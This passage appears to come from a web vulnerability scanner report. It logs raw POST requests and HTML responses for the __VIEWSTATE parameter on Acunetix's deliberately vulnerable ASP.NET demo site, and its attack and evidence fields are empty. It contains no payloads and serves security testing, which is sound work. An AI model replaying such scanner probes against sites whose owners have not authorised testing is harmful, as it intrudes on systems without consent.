<TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1149 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,149 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8293&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAnTutltoIZGRkRKdIzq92kaJj%2FOU%2F5t3r1j%2Fq0s8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo8P5DAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACRp4K83fXk88aClImmaIKuaD32eI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:22 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAnTutltoIZGRkRKdIzq92kaJj/OU/5t3r1j/q0s8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo8P5DAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACRp4K83fXk88aClImmaIKuaD32eI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:White" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8281&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAqD4%2FjdoIZGRkFAY0IZJxt%2F3xWgCDg8oECh2baUA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo4ZrvAwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAlyAr5wSLIKWazuZK43D01nsA2pV
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:05 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAqD4/jdoIZGRkFAY0IZJxt/3xWgCDg8oECh2baUA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo4ZrvAwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAlyAr5wSLIKWazuZK43D01nsA2pV" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:White" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> 